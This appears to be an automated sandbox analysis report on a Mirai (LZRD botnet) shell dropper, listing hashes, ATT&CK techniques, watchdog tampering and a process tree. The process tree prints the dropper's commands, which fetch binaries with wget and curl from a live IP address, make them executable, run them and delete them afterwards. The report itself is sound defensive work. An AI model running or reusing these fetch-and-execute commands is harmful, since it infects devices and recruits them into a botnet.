mirai | 4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621

Analysis

max time kernel
149s
max time network
150s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
28-11-2024 02:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh
Size

1KB
MD5

ea3e4ce3ad906187d77f71fd511caca5
SHA1

1826d8941b0d1aaa76fdade685e66e31e3732399
SHA256

4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621
SHA512

e9ac3561d6872982e7647f162635fe522c9abca8ca686d2f4853f62ae099c9b4a9f43076fc8f96ce2fc17d2dc02eb10067d811db34dc039c9a8761457830d9f7

Score

10^/10

mirai lzrd botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (20371) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1492	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/byte	1493	byte

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	byte
File opened for modification	/dev/misc/watchdog	byte

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/168/cmdline	byte
File opened for reading	/proc/1461/cmdline	byte
File opened for reading	/proc/1529/exe	byte
File opened for reading	/proc/1539/exe	byte
File opened for reading	/proc/1364/net/tcp	byte
File opened for reading	/proc/19/cmdline	byte
File opened for reading	/proc/1145/cmdline	byte
File opened for reading	/proc/1159/cmdline	byte
File opened for reading	/proc/1212/cmdline	byte
File opened for reading	/proc/1031/exe	byte
File opened for reading	/proc/1539/cmdline	byte
File opened for reading	/proc/170/cmdline	byte
File opened for reading	/proc/1141/cmdline	byte
File opened for reading	/proc/27/cmdline	byte
File opened for reading	/proc/29/cmdline	byte
File opened for reading	/proc/162/cmdline	byte
File opened for reading	/proc/1205/cmdline	byte
File opened for reading	/proc/1536/net/tcp	byte
File opened for reading	/proc/541/net/tcp	byte
File opened for reading	/proc/1274/net/tcp	byte
File opened for reading	/proc/1059/net/tcp	byte
File opened for reading	/proc/1165/net/tcp	byte
File opened for reading	/proc/78/cmdline	byte
File opened for reading	/proc/672/cmdline	byte
File opened for reading	/proc/1487/cmdline	byte
File opened for reading	/proc/241/net/tcp	byte
File opened for reading	/proc/408/net/tcp	byte
File opened for reading	/proc/1503/net/tcp	byte
File opened for reading	/proc/16/cmdline	byte
File opened for reading	/proc/172/cmdline	byte
File opened for reading	/proc/755/cmdline	byte
File opened for reading	/proc/1540/net/tcp	byte
File opened for reading	/proc/1117/net/tcp	byte
File opened for reading	/proc/1270/net/tcp	byte
File opened for reading	/proc/978/cmdline	byte
File opened for reading	/proc/1256/cmdline	byte
File opened for reading	/proc/1041/net/tcp	byte
File opened for reading	/proc/1155/net/tcp	byte
File opened for reading	/proc/676/cmdline	byte
File opened for reading	/proc/1104/cmdline	byte
File opened for reading	/proc/448/net/tcp	byte
File opened for reading	/proc/1031/net/tcp	byte
File opened for reading	/proc/1283/net/tcp	byte
File opened for reading	/proc/6/cmdline	byte
File opened for reading	/proc/31/cmdline	byte
File opened for reading	/proc/1480/cmdline	byte
File opened for reading	/proc/1535/cmdline	byte
File opened for reading	/proc/776/net/tcp	byte
File opened for reading	/proc/1159/net/tcp	byte
File opened for reading	/proc/10/cmdline	byte
File opened for reading	/proc/858/cmdline	byte
File opened for reading	/proc/1283/cmdline	byte
File opened for reading	/proc/526/net/tcp	byte
File opened for reading	/proc/1140/net/tcp	byte
File opened for reading	/proc/1127/cmdline	byte
File opened for reading	/proc/1165/cmdline	byte
File opened for reading	/proc/1293/cmdline	byte
File opened for reading	/proc/1364/cmdline	byte
File opened for reading	/proc/647/net/tcp	byte
File opened for reading	/proc/36/cmdline	byte
File opened for reading	/proc/1108/cmdline	byte
File opened for reading	/proc/1525/cmdline	byte
File opened for reading	/proc/1011/exe	byte
File opened for reading	/proc/460/net/tcp	byte

System Network Configuration Discovery 1 TTPs 1 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1503	wget

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/byte.x86	wget
File opened for modification	/tmp/byte.x86	curl
File opened for modification	/tmp/byte	4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh

/tmp/4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh
/tmp/4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh
1⤵
- Writes file to tmp directory
PID:1484
- /usr/bin/wget
  wget http://154.216.20.149/bins/byte.x86
  2⤵
  - Writes file to tmp directory
  PID:1485
- /usr/bin/curl
  curl -O http://154.216.20.149/bins/byte.x86
  2⤵
  - Writes file to tmp directory
  PID:1490
- /bin/cat
  cat byte.x86
  2⤵
  PID:1491
- /bin/chmod
  chmod +x 4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh byte byte.x86 config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-o1EmX0
  2⤵
  - File and Directory Permissions Modification
  PID:1492
- /tmp/byte
  ./byte byte.dvr
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads runtime system information
  PID:1493
- /bin/rm
  rm -rf byte
  2⤵
  PID:1497
- /usr/bin/wget
  wget http://154.216.20.149/bins/byte.mips
  2⤵
  - System Network Configuration Discovery
  PID:1503

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/byte.x86

Filesize
95KB

MD5
34ef09c6bfa12c8bb0a4eb1111163f49

SHA1
374e5712df7fba870afd7c7897c5bc23ba205f61

SHA256
537907609ffc903d04b1aa5309d9bd02b95a31f343763ae83cd61f9c1b797438

SHA512
4aecdc6165268aa3a214581b5bb1311ebd17b9a7f573fc45a914fd3c1b7c38faffbe7ca21628ca37752417c8270a66fa34d544a4e315271f462dd31953bd902f

Download Submit